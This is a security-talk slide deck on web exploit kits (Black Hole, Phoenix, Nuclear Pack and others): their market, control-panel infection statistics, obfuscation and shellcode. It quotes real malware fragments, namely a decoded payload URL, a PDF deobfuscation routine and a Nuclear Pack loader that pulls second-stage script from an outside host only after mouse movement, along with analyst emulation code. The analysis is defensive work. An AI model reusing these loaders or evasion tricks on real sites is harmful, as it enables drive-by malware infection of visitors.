ENTERPRISE SECURITY




Who Am I? 


• Team Lead, ASI 

• Malware Analysis 

• IP Reputation 

• Malicious content harvesting 




Web Exploit Kits Are...

Pre-packaged software that consists of

• Installers (usually)
 -Typically PHP-based

• Number of Exploits
 -Rarely 0-day

• Control Panel
 -Installer
 -Statistics
 -Configuration

• Install malicious payload
 -Botnet
 -Trojan
 -Fake AV
Exploit Kit Economy

• Cost up to thousands of dollars

• Rentals also offered on daily/weekly/monthly basis

• Bullet-proof hosting options

• Contain “EULA”-like agreements

• Marketing & competitiveness between kits

• Regularly issue updates
 -Bug-fixes
 -Exploit reliability updates
 -Aesthetic changes



Active Exploit Kits 



* Image courtesy of Kahu Security 
How Exploit Kits Typically Work

[Diagram: Exploit Kit Server]



Black Hole Exploit Kit 




What is Black Hole Exploit Kit? 


• Launched in late 2010 

• Currently most popular exploit kit 

• Version 1.2.3 

• Contains many recent Java exploits 

• Contains exploit for CVE-2012-1889 (MS XML) 

-0-day at the time 

• Good JavaScript obfuscation 
Black Hole in the News

USPS website hit by Blackhole Exploit Kit

by Steve Ragan - Apr 8 2011, 02:05 
Researchers at Zscaler have uncovered a Blackhole Kit 
attack carried out against the U.S. Postal Service's 
Rapid Information Bulletin Board System (RIBBS). This 
is the second Blackhole Kit attack discovered this week, 
after another was spotted on the website for the 
Houston International Film Festival on Monday. 

The Blackhole Kit, which was developed in Russia, cost 
about $1,500 USD annually for anyone who wants to 
deploy it, with discounts for six-month usage and 
quarterly usage. Described as being powerful, the kit 
that target vulnerabilities in Java and Adobe PDF. Upgrades to the 

developers add more obfuscation and encryption to 
Black Hole Events in 2011

Black Hole Spam Campaigns

• Spam is easy

• Target users with
 -Fake delivery notices
 -Fake IRS notices
 -Fake orders from online retailers

• User clicks the link
 -Owned!
Black Hole Control Panel

[Screenshot of the Black Hole STATISTIC page; the legible values are transcribed below]

TOTAL INFO: 450216 hits, 148233 hosts, 18997 loads (14.61 %)
TODAY INFO: 21899 hits, 8663 hosts, 978 loads (12.74 %)

EXPLOITS: Java Rhino, PDF LIBTIFF, PDF ALL, Java OBE, HCP, FLASH, MDAC

OS              HITS     HOSTS    LOADS    %
Windows 7       228122   81851    9227     12.50
Windows XP      107502   34616    5607     19.06
Windows Vista   88850    30063    4303     16.04
Windows 2003    538      105      27       27.55
Windows 2000    368      70       9        13.24
Windows NT      178      47       3        8.82
Windows 98      24       17       3        17.65
Linux           7773     1259     1        0.19
Mac OS          16845    2862     0        0.00

BROWSERS: Chrome, Firefox, MSIE, Mozilla, Opera, Safari

THREADS         HITS     HOSTS    LOADS    %
default         369      88       0        0.00
PT.DOR          319647   40022    6927     25.47
PT_DIGITAL      87724    79502    8088     10.18
NO              7707     6590     2335     39.08
IT_bukfcry      17774    11304    708      6.27
(unnamed)       16988    14730    1057     12.14

COUNTRIES: Portugal, Italy, Norway, United States, Iceland, Poland, Netherlands, Japan, Germany, China, United Kingdom, Czech Republic, Sweden, Canada, Romania, Other

*Image courtesy of Xylit0l
Black Hole Control Panel (cont.)

[Screenshot of the EXPLOITS view: loads per exploit with a per-OS breakdown; legible values transcribed below]

EXPLOIT         LOADS    %        per-OS loads
Java Rhino      16145    83.36    Windows 7 8844, Windows XP 4314, Windows Vista 3031, Windows 2003 23, Windows 2000 8, Windows NT 3, Linux 1
PDF LIBTIFF     1923     9.93     Windows Vista 385, Windows XP 588, Windows 7 356, Windows 2003 5
PDF ALL         497      2.57     Windows XP 330, Windows Vista 31, Windows 7 17, Windows 2003 1
Java OBE        366      1.89     Windows Vista 230, Windows XP 87, Windows 7 46, Windows 98 3
HCP             225      1.16     Windows XP 225, Windows 7 2
FLASH           124      0.64     Windows XP 123, Windows 7 1
MDAC            87       0.45     Windows XP 86, Windows 2000 1

*Image courtesy of Xylit0l
Black Hole Control Panel (cont.)

[Screenshot of a further control panel page]

*Image courtesy of Xylit0l
Black Hole Exploit URL Schemes

• Predictable

• Typically ending in .php
 -main.php and showthread.php most common

• One URL parameter
 -Normally 1-5 characters
 -Value is 16 valid hex characters

• Malware payload URL normally w.php
 -3 parameters
Black Hole JavaScript Obfuscation

• Changes a lot

• Typically consists of
 -Text blob in HTML tag or parameter
 -Deobfuscation routine

• Loads malicious frame for bulletproof site
 -More obfuscated JavaScript
 -Detects browser/plugin versions
 -Launches exploit to load malware
Black Hole JavaScript

[Screenshot of the landing page source: an <h1> "Please wait page is Loading..." placeholder followed by a minified helper library whose legible routines parse version strings and probe plugins (isDefined, isStrNum, formatNum, getAXO/ActiveXObject, isOpera, addWinEvent)]

Obfuscation (cont.)

[Screenshot of the deobfuscation loop; the legible fragment reads]
 for(k=a.length-1;k>=0;k--){
  if(window.document)try{dshsdfh.a
Black Hole PDF Obfuscation

• Slightly different obfuscation than JavaScript

• ASCII character replacement
 -&#00097 for “a”
 -Still uses giant text blobs
 -Characters separated by ‘@@@’

• Once deobfuscated follows the same pattern as
JavaScript in HTML
Black Hole JavaScript Shellcode

• Most exhibit the same behavior
 -Standard JMP / CALL to obtain address
 -Patches bytes of shellcode using XOR with 0x28
 -VOILA! Junk ASM code now valid
 -URL now visible near the end of the shellcode
 -Easily detected by many shellcode detection libs

[Disassembly excerpt: the decoded string at the end of the shellcode]
 000001A0  db 70h                                 ; p
 000001A1  aHttpWwwappslMy db 'http://wwwappsl-myups.com/t.php?f«6d4b0&e-l',0
 000001CD  db 0
Black Hole JavaScript Shellcode (cont.)

[Screenshot: IDA disassembly of the decoder stub, transcribed]

 0001  inc     ecx
 0002  inc     ecx
 0003  inc     ecx
 0004  and     sp, 0FFFCh
 0008  cld
 0009  jmp     short loc_1B
 000B loc_B:                              ; CODE XREF: seg000:loc_1B
 000B  pop     eax                        ; eax = address pushed by the CALL
 000C  xor     ecx, ecx
 000E  sub     cx, 0FE52h                 ; get number of bytes to patch
 0013 loc_13:                             ; CODE XREF: seg000:00000017
 0013  xor     byte ptr [eax], 28h        ; XOR shellcode bytes with 0x28
 0016  inc     eax
 0017  loop    loc_13
 0019  jmp     short shellcode
 001B loc_1B:                             ; CODE XREF: seg000:00000009
 001B  call    loc_B
 0020 shellcode:                          ; still encoded at this point:
 0020  test    esp, esp                   ; junk until the XOR loop has run
 0022  jna     short loc_58

A second sample (labels deobf_sc / loc_13 / loc_19) uses the same stub with
 000E  sub     cx, 0FE49h
and its still-encoded bytes at shellcode: disassemble as lodsd / int 3 / pop ebp / sbb al, 0C1h / ja short loc_42.
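The decoder stub above is simple enough to emulate directly, which is how an analyst pulls the payload URL out of a captured sample without running it. The following Node.js code is an added example, not from the talk; the stub length, the buffer contents and the URL are constructed placeholders.

```javascript
// Added example (not from the talk): emulate the decoder stub's XOR loop to
// recover the payload URL from a captured Black Hole shellcode buffer (Node.js).
// The sample buffer is constructed below; real samples carry other URLs.

const XOR_KEY = 0x28;

// The stub zeroes ecx then runs `sub cx, imm16`; with 16-bit wraparound the
// loop counter becomes 0x10000 - imm16, e.g. 0FE52h -> 0x1AE = 430 bytes.
function patchLength(imm16) {
  return (0x10000 - imm16) & 0xffff;
}

// Apply `xor byte ptr [eax], 28h; inc eax; loop` from offset `start`, which is
// the address the CALL pushed (the first byte after the stub).
function decodeStage(buf, start, imm16) {
  const out = Buffer.from(buf);
  const n = Math.min(patchLength(imm16), out.length - start);
  for (let i = 0; i < n; i++) out[start + i] ^= XOR_KEY;
  return out;
}

// After decoding, the URL sits near the end of the stage, NUL-terminated.
function extractUrl(buf) {
  const m = buf.toString("latin1").match(/https?:\/\/[\x21-\x7e]+(?=\x00)/);
  return m ? m[0] : null;
}

// Constructed sample: a 0x20-byte stub (its bytes are not part of the XOR
// pass) followed by a 430-byte encoded stage with a placeholder URL near its end.
const STUB_LEN = 0x20;
const IMM16 = 0xfe52;
const SAMPLE_URL = "http://kit.example.invalid/w.php?f=6d4b0&e=1&k=3";

function buildSample(url) {
  const stage = Buffer.alloc(patchLength(IMM16), 0x90);
  const tail = Buffer.from(url + "\x00", "latin1");
  tail.copy(stage, stage.length - tail.length - 4);
  for (let i = 0; i < stage.length; i++) stage[i] ^= XOR_KEY;
  return Buffer.concat([Buffer.alloc(STUB_LEN, 0xcc), stage]);
}

const SAMPLE = buildSample(SAMPLE_URL);

// Analyst entry point: the URL only appears once the XOR pass has run.
function recoverUrl(buf) {
  return extractUrl(decodeStage(buf, STUB_LEN, IMM16));
}
```

Shellcode detection libraries flag this family easily because the GetPC CALL, the single-byte XOR loop and the trailing plaintext URL are all visible in the decoded bytes.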
Phoenix Exploit Kit History

• Started in 2007

• Current version 3.1

• Offers full and mini versions
 -Mini version only allows one affiliate
 -Full allows for multiple

• Tracks visitors, only launches exploit once per IP

• Large number of exploits available
Phoenix Exploit Kit Statistics

[Screenshot: "Phoenix Exploit's Kit 3.1 full" control panel (motto: CONCORDIA, INTEGRITAS, INDUSTRIA...), page ?go=advanced_statistics; the counts are blacked out in the image]

Operation systems statistics (OS / Visits / Exploited / Percent): Other, Windows XP SP2, Windows XP, Windows 7, Windows, Linux, Windows 98, Windows Vista, Windows 95

Advanced browsers statistics (Browser / Visits / Exploited / Percent): Other, MSIE v6.0, MSIE v7.0, Firefox v11.0, Firefox v9.0.1, Opera v9.80, Safari, MSIE v8.0, MSIE v4.01, MSIE v7.01, Firefox v3.6.9, Opera, Firefox v1.5.0, Firefox v3.0.9, Firefox v3.6.28, MSIE v5.0, Opera v9.64

Menu: Simple statistics, Advanced statistics, Countries statistics, Referers statistics, Sources statistics, Clear statistics, Upload .exe, Exit

*Image courtesy of Xylit0l
Phoenix Exploit Kit Exploit Statistics

[Screenshot: the control panel's per-exploit statistics page]

*Image courtesy of Xylit0l
PEK JavaScript Obfuscation

• Uses multiple <script> tags
 -2 <script> tags
 -<textarea> tag
 -Final <script> tag

• Deobfuscated code still not obvious

• No “getShellcode” routine or “heap spray” references
PEK Obfuscated JavaScript

[Screenshot of the obfuscated page source: a chain of .replace() calls closes the first <script> tag, and a second <script> tag assigns a long text blob to a variable]


PEK PDF Obfuscation

• Resembles Black Hole JS obfuscation

• Large array of integers

• Run through deobfuscation routine, launch exploit

• Deobfuscation routine simpler than Black Hole

     // (beginning of the try block not shown in the screenshot)
     var hui = 12 / utml;      // utml is undefined: the ReferenceError drops execution into the catch block
   }
   catch (v32vrw)
   {
     i = 0;
     while (i != 3937)         // b is the integer array, a the alphabet it indexes
     {
       s = s + a[b[i]];        // rebuild the payload one character at a time
       i = 1 + i;
     }
     k = s;
     e(k);                     // hand the rebuilt string to e()
   }
Other Exploit Kits






Lots of New Kits 


• Large number of new kits in 2012 

• Multiple kits have popped up from China 

• Many more popping up from Eastern Europe 

• Some kits pop-up and then disappear 

• Too many to keep up with! 
Yang Pack

• Surfaced in late 2011 / early 2012

• Based out of China

• 3 exploits, very low detection rates

• Like many kits from China
 -No PHP files
 -No database backend
 -Consist only of static HTML files


Sweet Orange Exploit Kit 

• Surfaced in 2012 

• Aims to keep small footprint 

• Authors only give information to established 
cybercriminals 

• Costs $2500 

• Rents for $1400 

• Observed in the wild? 





Sweet Orange Exploit Kit (cont.) 



*lmage courtesy of Webroot / Dancho Danchev 
Sweet Orange Exploit Kit (cont.)

Nuclear Pack v2

• Been dormant for a few years 

• Resurfaced in 2012 with 4 exploits 

• Introduced anti-honeyclient feature 

-Difficult to automate collection of exploits 
-More interactive honeyclients/sandbox required 
Nuclear Pack Anti-Crawling

 (function() {
     var url = 'http://smmxkycxsu.webhop.org/g/';
     // xyzflag: 0 = waiting for the user, 1 = second stage requested, 2 = second stage loaded
     if (typeof window.xyzflag === 'undefined') {
         window.xyzflag = 0;
     }
     // nothing happens until the mouse moves, which an automated crawler never does
     document.onmousemove = function() {
         if (window.xyzflag === 0) {
             window.xyzflag = 1;
             var head = document.getElementsByTagName('head')[0];
             var script = document.createElement('script');
             script.type = 'text/javascript';
             script.onreadystatechange = function() {   // older IE
                 if (this.readyState == 'complete') {
                     window.xyzflag = 2;
                 }
             };
             script.onload = function() {               // other browsers
                 window.xyzflag = 2;
             };
             // random file name, so every request for the second stage is unique
             script.src = url + Math.random().toString().substring(3) + '.js';
             head.appendChild(script);
         }
     };
 })();
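The practical consequence for collection is easy to show with a few lines of Node.js. This is an added example, not code from the talk or the kit: a minimal fake DOM runs the loader logic above once with no input events (a fetch-and-parse crawler) and once with a synthetic mousemove (an interactive honeyclient); the stage-2 URL is a placeholder.

```javascript
// Added example (not from the talk): a minimal fake DOM showing why a passive
// crawler never sees Nuclear Pack's second stage while a honeyclient that
// synthesises a mousemove does (Node.js). The loader mirrors the snippet
// above; the stage-2 URL is a placeholder.

function makeFakeDom() {
  const requested = [];                       // script URLs the page tried to load
  const head = {
    appendChild(el) {
      requested.push(el.src);
      if (typeof el.onload === "function") el.onload();   // pretend the fetch completed
    },
  };
  const document = {
    onmousemove: null,
    getElementsByTagName(tag) { return tag === "head" ? [head] : []; },
    createElement(tag) { return { tagName: tag.toUpperCase(), src: "", type: "" }; },
  };
  return { window: {}, document, requested };
}

// The anti-crawling loader: the next stage is only injected once the visitor
// moves the mouse, and only once (xyzflag goes 0 -> 1 -> 2).
function installLoader(window, document) {
  const url = "http://stage2.example.invalid/g/";       // placeholder host
  if (typeof window.xyzflag === "undefined") window.xyzflag = 0;
  document.onmousemove = function () {
    if (window.xyzflag === 0) {
      window.xyzflag = 1;
      const head = document.getElementsByTagName("head")[0];
      const script = document.createElement("script");
      script.type = "text/javascript";
      script.onload = function () { window.xyzflag = 2; };
      script.src = url + Math.random().toString().substring(3) + ".js";
      head.appendChild(script);
    }
  };
}

// A fetch-and-parse crawler fires no input events; an interactive honeyclient
// dispatches a synthetic mousemove (twice here, to show the one-shot guard).
function visit(interactive) {
  const dom = makeFakeDom();
  installLoader(dom.window, dom.document);
  if (interactive && typeof dom.document.onmousemove === "function") {
    dom.document.onmousemove();
    dom.document.onmousemove();
  }
  return { requested: dom.requested, flag: dom.window.xyzflag };
}
```

A real honeyclient has to do the same through the browser's event model, and because the flag guard fires only once per page load, the second stage must be captured on that first synthetic event.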
Conclusion

• Exploit kits are only getting more 
sophisticated 

-Newer exploits 

-Changing evasions / obfuscations 

-This is a business for the authors, they are 
invested in staying one-step ahead to make 
money 

• Detecting new techniques takes work 

• Patch Java! 
Many Thanks to...

• Marc Eisenbarth, Joanna Burkey

• Alen Puzic, Mike Dausin, Jen Lake

• Jorge Mieres, Steven K/Xylit0l, Mila,
Dancho Danchev, SpiderLabs guys, Kahu
Security


THANK YOU 


QUESTIONS? 


